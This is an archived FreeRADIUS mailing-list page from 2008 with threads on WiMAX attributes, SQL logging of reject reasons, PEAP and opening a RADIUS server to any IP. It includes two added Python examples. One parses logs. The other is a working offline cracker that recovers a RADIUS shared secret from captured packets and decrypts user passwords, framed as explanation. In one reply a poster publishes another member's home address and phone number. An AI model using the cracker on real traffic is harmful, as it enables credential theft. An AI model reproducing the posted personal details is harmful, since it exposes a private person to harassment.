Re: WiMAX Auth
mysql> select * from radreply where username = 'kaffi';
+------+----------+---------------------+----+--------------+
| id   | username | attribute           | op | value        |
+------+----------+---------------------+----+--------------+
| 8614 | kaffi    | Filter-ID           | =  | Default      |
| 8615 | kaffi    | Session-Timeout     | =  | 3600         |
| 8626 | kaffi    | WiMAX-MN-NAI        | =  | %{User-Name} |
| 8627 | kaffi    | WiMAX-IP-Technology | =  | 3            |
+------+----------+---------------------+----+--------------+
4 rows in set (0.00 sec)

My dictionary entry:

ATTRIBUTE WiMAX-MN-NAI 78 string

My server log:

Thu Dec 18 07:47:51 2008 : Info: +- entering group post-auth {...}
Thu Dec 18 07:47:51 2008 : Info: [wimax] MIP-RK = 0x9682b6cc9925949cce138e6fd148e9ac21c94c9e552ef2173c3e996aef87bff96f50564a5dcf85a505300a4e319349dce56c5a1f0308e6bb7e29a5f89e0a4949
Thu Dec 18 07:47:51 2008 : Info: [wimax] MIP-SPI = 41f3aefe
Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: WiMAX-MN-NAI was not found in the request or in the reply.
Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: We cannot calculate MN-HA keys.
Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: WiMAX-IP-Technology not found in reply.
Thu Dec 18 07:47:51 2008 : Info: [wimax] WARNING: Not calculating MN-HA keys
Thu Dec 18 07:47:51 2008 : Info: ++[wimax] returns updated
Thu Dec 18 07:47:51 2008 : Info: ++[exec] returns noop
Sending Access-Accept of id 223 to 192.168.106.2 port 1812
	Filter-Id = "Default"
	Session-Timeout = 3600
	WiMAX-MN-NAI = "%{User-Name}"
	WiMAX-IP-Technology = CMIP4
	MS-MPPE-Recv-Key = 0x0d8927cde5e7cd69d7b1af9e38e7fb91948e2d4202cbdaa3b2273457423f9e03
	MS-MPPE-Send-Key = 0x84eb7dad459a1bbda54348214562953f89220223440dc41d95181167c4cedc95
	EAP-Message = 0x03080004
	Message-Authenticator = 0x
	User-Name = "{am=1}155486b1a70ae371e7f2cacc01189ccc"
Thu Dec 18 07:47:51 2008 : Info: Finished request 15.

Any idea what might be wrong?

PS: Changing WiMAX-MN-NAI = "%{User-Name}" to 'kaffi' doesn't make a difference.

Sincerely,
Kristoffer Milligan

On Wed, 2008-12-17 at 22:58 +0100, t...@kalik.net wrote:
> > My question is, where do I add these replies? I currently have my radius
> > doing its lookups in a MySQL database.
>
> radreply table.
>
> Ivan Kalik
> Kalik Informatika ISP

-
List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: How to log failed auth attempts?
> You are probably the first to want the exact same text. Someone may
> have wanted to log the reason for the reject, but they probably didn't
> care about the exact representation of that reason.

I just want what FreeRadius is already logging to the text file, I don't want any special custom text for each error, just what's already being logged to the text files.

Thanks for your help, I don't think I want to dig that hard to get this solution, I am just surprised that it's this hard. If the info is already being logged to the text file, it must exist in some variable which should allow me to get it and insert the same into the DB. Hmmm..

Either way, if I can't solve this fairly simply, I will probably parse the radiusd.log file with a command line script and insert each line into a table. I do this now with some other log files, this allows me to then do web based queries against the tables.

Regards,
Todd Routhier

-----Original Message-----
From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org] On Behalf Of Scott Lambert
Sent: Wednesday, December 17, 2008 10:39 PM
To: FreeRadius users mailing list
Subject: Re: How to log failed auth attempts?

On Wed, Dec 17, 2008 at 07:51:48PM -0600, Todd R. wrote:
> This seems odd, I can't be the first person to want to have the reason for
> the reject in the SQL table??
>
> It can't be rocket science to get this to log in the DB when it's already
> being logged in the text logs??

You are probably the first to want the exact same text. Someone may have wanted to log the reason for the reject, but they probably didn't care about the exact representation of that reason.

If you want this, I suspect that you will need to look at the source code which generates the text for the log module. It may tell you the correct variable to use so you can store the correct reason value in the database. You can then build logic in your reporting logic to show you the text you want. That would likely be more efficient, storage wise, for your database too.

It's not rocket science, but it is likely "some assembly required."

I am not a FreeRADIUS developer, so this is speculation.

--
Scott Lambert                    KC5MLE                       Unix SysAdmin
lamb...@lambertfam.org
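Todd's fallback above (parse radiusd.log with a script and insert each line into a table) in working form. This is an added example, not code from the thread and not FreeRADIUS code. It assumes the 2.x "Auth:" line format that the log section Alan pointed at produces with auth = yes and auth_badpass = yes, runs constructed sample lines (not real traffic) through a regex, and loads them into an in-memory SQLite table shaped like radpostauth with the rejectreason column Todd wanted; sqlite3 stands in for MySQL so the script runs offline.

```python
"""Load FreeRADIUS radiusd.log authentication lines into a radpostauth-style table
that also carries the reject reason.

Added example, not from the thread and not FreeRADIUS code. Assumes the 2.x
"Auth:" line format produced with auth = yes / auth_badpass = yes in the
radiusd.conf log section; the `rejectreason` column name and the SQLite
stand-in for MySQL are this example's choices.
"""
import re
import sqlite3
from datetime import datetime

# Constructed sample lines in the radiusd.log "Auth:" shape; not real traffic.
SAMPLE_LOG = """\
Wed Dec 17 13:09:15 2008 : Auth: Login incorrect (rlm_pap: CLEAR TEXT password check failed): [dan@somerealm.com/mybadpass] (from client ap1 port 0)
Wed Dec 17 13:09:42 2008 : Auth: Login OK: [dan@somerealm.com] (from client ap1 port 0)
Wed Dec 17 13:10:03 2008 : Auth: Login incorrect: [nobody@somerealm.com/guess] (from client ap2 port 1 cli 00-11-22-33-44-55)
Wed Dec 17 13:10:04 2008 : Info: Ready to process requests.
"""

# Timestamp, "Auth:", result with optional "(module: reason)", "[user/pass]" (the
# password is only present for failed attempts when auth_badpass = yes), client.
AUTH_LINE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) : Auth: "
    r"(?P<result>Login (?:OK|incorrect))"
    r"(?: \((?P<reason>[^)]*)\))?: "
    r"\[(?P<user>[^/\]]*)(?:/(?P<pass>[^\]]*))?\] "
    r"\(from client (?P<client>\S+) port (?P<port>\d+)"
)

SCHEMA = """
CREATE TABLE IF NOT EXISTS radpostauth (
    id           INTEGER PRIMARY KEY AUTOINCREMENT,
    username     TEXT NOT NULL,
    pass         TEXT NOT NULL DEFAULT '',
    reply        TEXT NOT NULL,
    rejectreason TEXT NOT NULL DEFAULT '',
    authdate     TEXT NOT NULL
)
"""


def parse_auth_line(line):
    """Return the radpostauth row for an Auth: line, or None for any other line."""
    m = AUTH_LINE.match(line)
    if not m:
        return None
    accepted = m.group("result") == "Login OK"
    when = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return {
        "username": m.group("user"),
        "pass": m.group("pass") or "",
        "reply": "Access-Accept" if accepted else "Access-Reject",
        # Module text when the server gave one, else the bare result.
        "rejectreason": "" if accepted else (m.group("reason") or m.group("result")),
        "authdate": when.strftime("%Y-%m-%d %H:%M:%S"),  # MySQL DATETIME shape
    }


def load_log(lines, conn):
    """Insert every Auth: line into radpostauth; returns the number inserted."""
    conn.execute(SCHEMA)
    rows = [row for row in map(parse_auth_line, lines) if row]
    conn.executemany(
        "INSERT INTO radpostauth (username, pass, reply, rejectreason, authdate) "
        "VALUES (:username, :pass, :reply, :rejectreason, :authdate)",
        rows,
    )
    conn.commit()
    return len(rows)


def rejects(conn):
    """(username, rejectreason, authdate) for every Access-Reject, oldest first."""
    return conn.execute(
        "SELECT username, rejectreason, authdate FROM radpostauth "
        "WHERE reply = 'Access-Reject' ORDER BY id"
    ).fetchall()


def demo():
    """Run the constructed sample through an in-memory database."""
    conn = sqlite3.connect(":memory:")
    inserted = load_log(SAMPLE_LOG.splitlines(), conn)
    return inserted, rejects(conn)


if __name__ == "__main__":
    count, rows = demo()
    print(f"{count} auth lines loaded; rejects:")
    for row in rows:
        print(row)
```

The pass column only ever receives the password the server chose to log (the bad one, with auth_badpass on). The stock dialup.conf postauth_query quoted later in this thread writes the submitted password on every attempt, accepted or not; a mistyped password is very often a valid password for some other account, so keeping that column populated in a reporting database is worth reconsidering.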
Re: How to log failed auth attempts?
On Wed, Dec 17, 2008 at 07:51:48PM -0600, Todd R. wrote:
> This seems odd, I can't be the first person to want to have the reason for
> the reject in the SQL table??
>
> It can't be rocket science to get this to log in the DB when it's already
> being logged in the text logs??

You are probably the first to want the exact same text. Someone may have wanted to log the reason for the reject, but they probably didn't care about the exact representation of that reason.

If you want this, I suspect that you will need to look at the source code which generates the text for the log module. It may tell you the correct variable to use so you can store the correct reason value in the database. You can then build logic in your reporting logic to show you the text you want. That would likely be more efficient, storage wise, for your database too.

It's not rocket science, but it is likely "some assembly required."

I am not a FreeRADIUS developer, so this is speculation.

--
Scott Lambert                    KC5MLE                       Unix SysAdmin
lamb...@lambertfam.org
RE: How to log failed auth attempts?
Well, it appears that what I had was correct, at least I think so..

Ex. %{reply:Reply-Message}

The problem seems to be that when a bad password is the reject reason, the Reply-Message is just blank. On the other hand, if I set the account expiration in the past, the Reply-Message contains "Password Has Expired=0D=0A".

This seems odd, I can't be the first person to want to have the reason for the reject in the SQL table??

It can't be rocket science to get this to log in the DB when it's already being logged in the text logs??

Thanks for continuing to assist me.

Regards,
Todd Routhier

-----Original Message-----
From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org] On Behalf Of Todd R.
Sent: Wednesday, December 17, 2008 7:24 PM
To: 'FreeRadius users mailing list'
Subject: RE: How to log failed auth attempts?

> > What variable can I use to pull the reject reason, is it something like
> > %{reply:Reply-Message}
>
> That is a good choice.

I tried this but I just end up with a blank entry in the database.

> > Am I missing anything else to accomplish this?
>
> You just need to compose text that will go into the Reply-Message.

Thing is, I don't want to compose anything, I want to insert the same reject reason that is being displayed in the text error log. I don't have to compose the text to get it to log to the text log, it just happens.

I am looking to populate my "rejectreason" field in the radpostauth table with the reason for the reject. I already have "Access-Reject" under the reply field but this isn't very informative and causes me to go dig through the text log to find the reason for the reject.

Thanks for any clarification you can provide.

Regards,
Todd Routhier

-----Original Message-----
From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org] On Behalf Of t...@kalik.net
Sent: Wednesday, December 17, 2008 7:08 PM
To: FreeRadius users mailing list
Subject: RE: How to log failed auth attempts?

> I do see this query in sql/mysql/dialup.conf that controls the insert:
>
> postauth_query = "INSERT INTO ${postauth_table} \
>                   (username, pass, reply, authdate) \
>                   VALUES ( \
>                   '%{User-Name}', \
>                   '%{%{User-Password}:-%{Chap-Password}}', \
>                   '%{reply:Packet-Type}', '%S')"
>
> I am guessing I need to modify this query and the DB schema to suit my
> needs.

Yes.

> What variable can I use to pull the reject reason, is it something like
> %{reply:Reply-Message}

That is a good choice.

> Am I missing anything else to accomplish this?
>

You just need to compose text that will go into the Reply-Message.

> Is there a list of available variables to use

doc/variables.txt

Ivan Kalik
Kalik Informatika ISP
RE: How to log failed auth attempts?
> > What variable can I use to pull the reject reason, is it something like
> > %{reply:Reply-Message}
>
> That is a good choice.

I tried this but I just end up with a blank entry in the database.

> > Am I missing anything else to accomplish this?
>
> You just need to compose text that will go into the Reply-Message.

Thing is, I don't want to compose anything, I want to insert the same reject reason that is being displayed in the text error log. I don't have to compose the text to get it to log to the text log, it just happens.

I am looking to populate my "rejectreason" field in the radpostauth table with the reason for the reject. I already have "Access-Reject" under the reply field but this isn't very informative and causes me to go dig through the text log to find the reason for the reject.

Thanks for any clarification you can provide.

Regards,
Todd Routhier

-----Original Message-----
From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org] On Behalf Of t...@kalik.net
Sent: Wednesday, December 17, 2008 7:08 PM
To: FreeRadius users mailing list
Subject: RE: How to log failed auth attempts?

> I do see this query in sql/mysql/dialup.conf that controls the insert:
>
> postauth_query = "INSERT INTO ${postauth_table} \
>                   (username, pass, reply, authdate) \
>                   VALUES ( \
>                   '%{User-Name}', \
>                   '%{%{User-Password}:-%{Chap-Password}}', \
>                   '%{reply:Packet-Type}', '%S')"
>
> I am guessing I need to modify this query and the DB schema to suit my
> needs.

Yes.

> What variable can I use to pull the reject reason, is it something like
> %{reply:Reply-Message}

That is a good choice.

> Am I missing anything else to accomplish this?
>

You just need to compose text that will go into the Reply-Message.

> Is there a list of available variables to use

doc/variables.txt

Ivan Kalik
Kalik Informatika ISP
RE: How to log failed auth attempts?
> I do see this query in sql/mysql/dialup.conf that controls the insert:
>
> postauth_query = "INSERT INTO ${postauth_table} \
>                   (username, pass, reply, authdate) \
>                   VALUES ( \
>                   '%{User-Name}', \
>                   '%{%{User-Password}:-%{Chap-Password}}', \
>                   '%{reply:Packet-Type}', '%S')"
>
> I am guessing I need to modify this query and the DB schema to suit my
> needs.

Yes.

> What variable can I use to pull the reject reason, is it something like
> %{reply:Reply-Message}

That is a good choice.

> Am I missing anything else to accomplish this?
>

You just need to compose text that will go into the Reply-Message.

> Is there a list of available variables to use

doc/variables.txt

Ivan Kalik
Kalik Informatika ISP
Re: PEAP with Windows supplicant, Automatically use my windows credentials
> [mschap] expand: --username=%{Stripped-User-Name:-%{User-Name:-%{mschap:User-Name}}} -> --username=administrator
> [mschap] mschap2: 94
> [mschap] expand: --challenge=%{mschap:Challenge:-00} -> --challenge=c92aee56ea24cca3
> [mschap] expand: --nt-response=%{mschap:NT-Response:-00} -> --nt-response=edfe77fdefdc346cfcb795de77c1bfb7e882075da213a532
> Exec-Program output: NT_KEY: 0B31E07CE9C3855E7B73F3A94ED21EB5
> Exec-Program-Wait: plaintext: NT_KEY: 0B31E07CE9C3855E7B73F3A94ED21EB5
> Exec-Program: returned: 0
> [mschap] adding MS-CHAPv2 MPPE keys
> ++[mschap] returns ok
> MSCHAP Success

Password is different.

Ivan Kalik
Kalik Informatika ISP
RE: How to log failed auth attempts?
I do see this query in sql/mysql/dialup.conf that controls the insert:

postauth_query = "INSERT INTO ${postauth_table} \
                  (username, pass, reply, authdate) \
                  VALUES ( \
                  '%{User-Name}', \
                  '%{%{User-Password}:-%{Chap-Password}}', \
                  '%{reply:Packet-Type}', '%S')"

I am guessing I need to modify this query and the DB schema to suit my needs.

What variable can I use to pull the reject reason, is it something like %{reply:Reply-Message}?

Am I missing anything else to accomplish this?

Is there a list of available variables to use in these situations and what they mean?

Thanks again!

Regards,
Todd Routhier

-----Original Message-----
From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org] On Behalf Of Todd R.
Sent: Wednesday, December 17, 2008 2:15 PM
To: 'FreeRadius users mailing list'
Subject: RE: How to log failed auth attempts?

Alan,

Thanks for your response..

First, I can't believe I missed this section of the radiusd.conf file, I looked, really I did :) I also noticed that it said that many things are logged when running "radiusd -X" which explains some other things..

I made some changes and now I have sufficient log info in the text files.

Hate to push my luck here but I would love to expand what is being logged SQL wise in my MySQL db. Right now, I have something like this logging on a failed attempt in the MySQL DB within the radpostauth table:

id, username, pass, reply, authdate
41, d...@somerealm.com, mypass, Access-Accept, 2008-12-17 13:09:15

What I would like to see is something like this:

id, username, pass, reply, reply-message, authdate
41, d...@somerealm.com, mybadpass, Access-Accept, Login incorrect (rlm_pap: CLEAR TEXT password check failed), 2008-12-17 13:09:15

Any help with this would be appreciated.

Regards,
Todd R.

-----Original Message-----
From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org] On Behalf Of Alan DeKok
Sent: Wednesday, December 17, 2008 5:32 AM
To: FreeRadius users mailing list
Subject: Re: How to log failed auth attempts?

Todd R. wrote:
> It seems that most things I have read suggest that failed authentication
> attempts are logged to the radius.log by default but they do not show up for
> me.

Edit raddb/radiusd.conf, and read the "log" section. It has configuration entries that control this behavior.

Alan DeKok.
Re: Duplicate IPs for Radius Clients with different secrets -allow any client IP?
t...@kalik.net wrote:
> > What could a hacker do to the server if he can't even get past returning a
> > correct shared secret?
>
> Get the usernames and passwords of your users and gain access to your
> network at will. Publish them and let anybody use your network.

Internet for free. Sounds great.

Here's one example, is this you?

Geier, Eric
m...@egeier.com
297 Marchmont Drive
Fairborn, Ohio 45324
United States
+1.9372600286

First Google hit: http://www.informit.com/authors/bio.aspx?a=AFEDE263-5156-4C97-AD8E-5E4473511557

Interesting list of books on your site.

"Say I did open up to any IP, the AP's MAC must match one from my list; moreover the hacker must have the shared secret. Plus if I can add to the example SQL statement, I would add to the WHERE clause "and domain = (domain pulled from what's after the username's @ sign)". Then the hacker must know a username and domain that matches an acceptable AP, the user's password, that acceptable AP's MAC address, and then finally the shared secret for the AP."

So, because a lot of hurdles are put in front of someone that should stop them? If so, I would never be where I am today. All that does is challenge your adversaries' intellect, and let us face reality a bit, the ones that know what they do would take that challenge on any day.

Put a carrot in front of a donkey, and it'll get eaten. Put a lot of carrots in front of the donkey and they'll still get eaten, it'll just take slightly longer.

I can't see how putting your authentication and authorization system in the wild will help you, other than saving a buck on setting up VPNs between your sites. Which can also be done cheaply if cost is the motivator.

Don't put an infrastructure piece like this in the open if you use it for your internal purposes. Wouldn't you agree?

//anders
Re: PEAP with Windows supplicant, Automatically use my windows credentials
> I've configured a PEAP with the Windows SP3 supplicant with freeradius 2.1.3,
> and the authentication succeeds when "Automatically use my windows logon name
> and password (and domain if any)" is unselected, which forces a manual logon.
> However, when "Automatically use my ..." is selected with the same user
> name/domain, the authentication fails.

How same is "the same user name/domain"? Post the debug of the good attempt. Please use radiusd -X. We don't need to see "Wed Dec 17 09:07:24 2008 : Debug:" in front of every line.

Ivan Kalik
Kalik Informatika ISP
Re: WiMAX Auth
> My question is, where do I add these replies? I currently have my radius
> doing its lookups in a MySQL database.
>

radreply table.

Ivan Kalik
Kalik Informatika ISP
Re: Conf PEAP
> I am configuring PEAP and there is not much information about it,
>

Mainly because there is nothing to configure. It "just works" with default configuration.

> Should I add a user in the user file alone?

That's best for testing - user entry at the top of the users file.

>
> If default is configured with EAP, what should I modify another file?
>

Nothing.

> [peap] <<< TLS 1.0 Alert [length 0002], fatal unknown_ca
> TLS Alert read:fatal:unknown CA
> TLS_accept:failed in SSLv3 read client certificate A

But your problem has nothing to do with the user. You haven't imported the CA certificate onto the user's machine. At least not the correct one.

Ivan Kalik
Kalik Informatika ISP
Basic question on rlm_perl
hi,

I am building freeradius 2.1.3 on ubuntu (configure/make/make install). I am trying to use the perl module, but I can't start my server. I have put "perl" as a module in my radiusd.conf file. I don't find the rlm_perl*.so file in /usr/local/lib/ where all the other rlm_*.so files are located.

What am I missing? I also tried to configure with the experimental modules flag.

Thanks
-a
Re: external script reply
> Exec-Program output: Tunnel-Type = VLAN Tunnel-Medium-Type = IEEE-802
> Tunnel-Private-Group-Id = vlan20

That didn't come out well. It should look like the reply list in users file: reply1, reply2, reply3

Try adding ",\n" between attributes.

Ivan Kalik
Kalik Informatika ISP
Re: WISPr-Bandwidth question
Thanks, Leigh...

Yes, that does make more sense. How you explained it. So basically, I would need to put a NAC (network access controller) at each remote location. BUT... I wouldn't necessarily have to put a "traditional" captive portal at each location, even though they would probably provide pretty much the same features.

thx...

Kevin

On Wed, 2008-12-17 at 12:49 -0500, Leigh Martell wrote:
> Hello Kevin,
>
> I can't answer definitively, but I would assume that it would be done
> on your NAS (depending on your hardware these rules "could" be
> propagated to the child devices). It would defy all logic for it to be
> done on the client. Just as you would in an unauthenticated
> wired/wireless network it is always best to control traffic at the
> distribution point.
>
> Hope that helps.
>
> Take Care,
> Leigh Martell
>
> On Wed, Dec 17, 2008 at 12:14 PM, kevin wrote:
> > While an "out of the box" solution is where I'll probably end up, I'm
> > battling with myself over the idea of how to best manage bandwidth on a
> > network including multiple remote locations, with both wired and
> > wireless connections.
> >
> > I'm moving to using freeradius to authenticate (which ultimately will be
> > done by MAC for initial ease of setup) but I'm trying to figure out
> > where the Bandwidth attributes actually are used.
> >
> > IOW, when using WISPr-Bandwidth, does that modify the client connection
> > at the client computer or does that occur at a proxy or firewall device?
> > What I'm getting at is, is a captive portal necessary or can a person
> > simply have client authentication via freeradius and the client network
> > card handle managing its own bandwidth? And if so, is there any
> > possibility that the client computer could be modified by someone with a
> > bit of skill to bypass those controls?
> >
> > Hope that made sense.
> >
> > Cheers,
> >
> > Kevin
RE: Duplicate IPs for Radius Clients with different secrets -allow any client IP?
> What could a hacker do to the server if he can't even get past returning a
> correct shared secret?

Get the usernames and passwords of your users and gain access to your network at will. Publish them and let anybody use your network.

Ivan Kalik
Kalik Informatika ISP
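Ivan's answer above and Anders' longer reply in the same thread state what an attacker gains once past the shared secret; the following added example (not from the thread, not FreeRADIUS code) shows why the secret itself is a thin barrier once the server is reachable from the Internet. Following RFC 2865, it builds a constructed Access-Request/Access-Accept pair protected by a weak secret, recovers the secret offline from the Response Authenticator with a word list, and uses it to decrypt the User-Password. The packet contents, the secret "open" (the value in Eric's sketched 0.0.0.0/0 client entry), the username and the word list are all constructed for the example.

```python
"""Offline recovery of a RADIUS shared secret from one captured Access-Request /
Access-Accept pair, then decryption of the hidden User-Password.

Added example, not from the thread and not FreeRADIUS code. It follows RFC 2865
section 3 (Response Authenticator) and section 5.2 (User-Password hiding). The
packets, the secret and the word list are constructed here so it runs offline.
"""
import hashlib
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD = 1, 2
HEADER_LEN = 20  # code, id, length, 16-byte authenticator


def _attr(atype, value):
    """One RADIUS attribute: type, length (including this header), value."""
    return struct.pack("BB", atype, len(value) + 2) + value


def hide_password(password, secret, req_auth):
    """RFC 2865 5.2: zero-pad to 16-byte blocks; c_i = p_i XOR MD5(secret + c_{i-1}),
    with the Request Authenticator standing in for c_0."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out += block
        prev = block
    return out


def reveal_password(ciphertext, secret, req_auth):
    """Inverse of hide_password; the trailing zero padding is removed
    (a password that itself ends in NUL bytes would lose them)."""
    out, prev = b"", req_auth
    for i in range(0, len(ciphertext), 16):
        block = ciphertext[i:i + 16]
        out += bytes(x ^ y for x, y in zip(block, hashlib.md5(secret + prev).digest()))
        prev = block
    return out.rstrip(b"\x00")


def build_request(ident, req_auth, username, password, secret):
    """Access-Request carrying User-Name and a hidden User-Password."""
    attrs = _attr(USER_NAME, username) + _attr(USER_PASSWORD, hide_password(password, secret, req_auth))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, HEADER_LEN + len(attrs)) + req_auth + attrs


def build_response(code, ident, req_auth, attrs, secret):
    """Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, HEADER_LEN + len(attrs))
    return header + hashlib.md5(header + req_auth + attrs + secret).digest() + attrs


def parse(packet):
    """Split a packet into (code, id, authenticator, {type: value}, raw attribute bytes)."""
    code, ident, length = struct.unpack("!BBH", packet[:4])
    attrs, pos = {}, HEADER_LEN
    while pos < length:
        atype, alen = packet[pos], packet[pos + 1]
        attrs[atype] = packet[pos + 2:pos + alen]
        pos += alen
    return code, ident, packet[4:HEADER_LEN], attrs, packet[HEADER_LEN:length]


def crack_secret(request, response, wordlist):
    """Return the word that validates the Response Authenticator, or None.

    Everything in the hash except the secret is on the wire, so each guess
    costs one MD5 and needs no further traffic to the server.
    """
    _, _, req_auth, _, _ = parse(request)
    code, ident, resp_auth, _, raw_attrs = parse(response)
    header = struct.pack("!BBH", code, ident, HEADER_LEN + len(raw_attrs))
    for guess in wordlist:
        if hashlib.md5(header + req_auth + raw_attrs + guess).digest() == resp_auth:
            return guess
    return None


def demo():
    """Constructed capture: a NAS talking to an Internet-facing server with a weak secret."""
    secret = b"open"                      # the value from the 0.0.0.0/0 sketch in the thread
    req_auth = bytes(range(16))           # a real NAS picks this at random
    request = build_request(7, req_auth, b"kaffi@example.net", b"s3cretpw", secret)
    response = build_response(ACCESS_ACCEPT, 7, req_auth, b"", secret)

    wordlist = [b"testing123", b"radius", b"secret", b"open", b"password"]
    found = crack_secret(request, response, wordlist)
    if found is None:
        return None, None
    _, _, _, attrs, _ = parse(request)
    return found, reveal_password(attrs[USER_PASSWORD], found, req_auth)


if __name__ == "__main__":
    secret, password = demo()
    print(f"recovered secret: {secret!r}; user password: {password!r}")
```

One captured exchange is enough: the attacker tests guesses at MD5 speed without sending another packet, so rate limiting at the server (the five-minute block Eric mentions) does not slow this down. With EAP the user password is not carried in User-Password, but the MS-MPPE-Send-Key and MS-MPPE-Recv-Key attributes in the Access-Accept (visible in the WiMAX debug output earlier on this page) are encrypted under the same shared secret (RFC 2548), so a recovered secret yields the session keys instead. A 0.0.0.0/0 client with a fixed secret removes even this step, since the attacker already knows the secret.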
Re: WISPr-Bandwidth question
> IOW, when using WISPr-Bandwidth, does that modify the client connection
> at the client computer or does that occur at a proxy or firewall device?

When you use bandwidth control attributes they are used by your NAS (AP, router, switch, captive portal ...). You should read NAS documentation to find the most appropriate one for you (wired connection is hardly going to use WISPr attributes).

Ivan Kalik
Kalik Informatika ISP
RE: Duplicate IPs for Radius Clients with different secrets - allow any client IP?
Thanks for the info, Anders. Yes, I'm considering security issues. Just would be really great if I could make everything work as I want...while still being secure.

> Why bother doing the SQL stuff, if you're going to let anyone use your service anyway?

The way I thought it up, it would allow any IP to TRY to run its request to the server...whereas if real client IPs are given, requests are denied before the server does any work if the client IP isn't on the list.

Say I did open up to any IP, the AP's MAC must match one from my list; moreover the hacker must have the shared secret. Plus if I can add to the example SQL statement, I would add to the WHERE clause "and domain = (domain pulled from what's after the username's @ sign)". Then the hacker must know a username and domain that matches an acceptable AP, the user's password, that acceptable AP's MAC address, and then finally the shared secret for the AP.

What could a hacker do to the server if he can't even get past returning a correct shared secret? Cause DoS attacks? If so, I can try to find something that blocks requests from originating IPs for 5 mins after so many requests.

What do you think?

Thanks for your input,
Eric

From: freeradius-users-bounces+me=egeier@lists.freeradius.org [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On Behalf Of Anders Holm
Sent: Wednesday, December 17, 2008 2:55 PM
To: FreeRadius users mailing list
Subject: Re: Duplicate IPs for Radius Clients with different secrets - allow any client IP?

Eric Geier wrote:
> Thank you for the info, David. I think the following is an example of how this could work, which I googled:
>
> client 212.37.57.2 {
>     secret = "%{sql:SELECT secret FROM accesspoints WHERE id = %{raw:NAS-Identifier}}"
>     shortname = "just one of our example networks"
> }
>
> I'm thinking I could even just have one client entry like this...but set to allow any IP. Is that possible?
>
> clients.conf
> client 0.0.0.0/0, shared secret = "open" ...

Why bother doing the SQL stuff, if you're going to let anyone use your service anyway? Think about it ... clients.conf controls which APs/NAS' are allowed to send you stuff to process. If your intention is to open it for anyone that can reach your service, why then do the above? The end clients are not what will send you requests, the APs are ... I think you've missed the point of the IP addressing for the end clients versus how you wish to handle the APs ...

And for a service which allows or denies access for your internal users, I wouldn't personally allow anyone from the outside world to even get close to that service. You want to understand basic networking and security considerations before seriously contemplating this. Start looking at getting a VPN solution between your offices, or simply just put one FreeRADIUS box in each office.

Continue on this path and fairly soon someone will have found your wireless setup and the service which allows clients to authenticate sitting out in the open. You might as well not have anything in place at all then...

//anders

> This would prevent me from having to track Internet IP changes among the multiple offices and locations where these separate WPA-Enterprise networks will be located at.
>
> Thanks!
> Eric
>
> -----Original Message-----
> From: freeradius-users-bounces+me=egeier@lists.freeradius.org [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On Behalf Of wlanmac
> Sent: Wednesday, December 17, 2008 8:42 AM
> To: freeradius-users@lists.freeradius.org
> Subject: Re: Duplicate IPs for Radius Clients with different secrets
>
> It's easy! Just google for rlm_raw and use it with a SQL xlat rule to pick out the shared secret from a database. I have been doing this way for years... in FreeRADIUS v1 and v2.
>
> David
> coova.org
>
> Date: Wed, 17 Dec 2008 10:16:17 +0200
> From: Johan Meiring
> Subject: Re: Duplicate IPs for Radius Clients with different secrets
> To: FreeRadius users mailing list
> Message-ID: <4948b551.6030...@pcservices.co.za>
>
> Eric Geier wrote:
> > If I understand what you said, I would only need one IP entry (the Internet IP) in the config file for each location, right? Most of these locations will be using dynamic Internet IPs; I'm not sure how I'd keep the config updated. Plus this would make each location/network use the same shared secret among all their APs, which I want to prevent.
>
> Alan,
>
> The Nas-Identifier being available to dynamic clients will also solve Eric's problem.
>
> Any update on when it might be available?
>
> Thanks!
RE: How to log failed auth attempts?
Alan,

Thanks for your response..

First, I can't believe I missed this section of the radiusd.conf file, I looked, really I did :) I also noticed that it said that many things are logged when running "radiusd -X" which explains some other things..

I made some changes and now I have sufficient log info in the text files.

Hate to push my luck here but I would love to expand what is being logged SQL wise in my MySQL db. Right now, I have something like this logging on a failed attempt in the MySQL DB within the radpostauth table:

id, username, pass, reply, authdate
41, d...@somerealm.com, mypass, Access-Accept, 2008-12-17 13:09:15

What I would like to see is something like this:

id, username, pass, reply, reply-message, authdate
41, d...@somerealm.com, mybadpass, Access-Accept, Login incorrect (rlm_pap: CLEAR TEXT password check failed), 2008-12-17 13:09:15

Any help with this would be appreciated.

Regards,
Todd R.

-----Original Message-----
From: freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org [mailto:freeradius-users-bounces+tjrlist=lightwavetech@lists.freeradius.org] On Behalf Of Alan DeKok
Sent: Wednesday, December 17, 2008 5:32 AM
To: FreeRadius users mailing list
Subject: Re: How to log failed auth attempts?

Todd R. wrote:
> It seems that most things I have read suggest that failed authentication
> attempts are logged to the radius.log by default but they do not show up for
> me.

Edit raddb/radiusd.conf, and read the "log" section. It has configuration entries that control this behavior.

Alan DeKok.
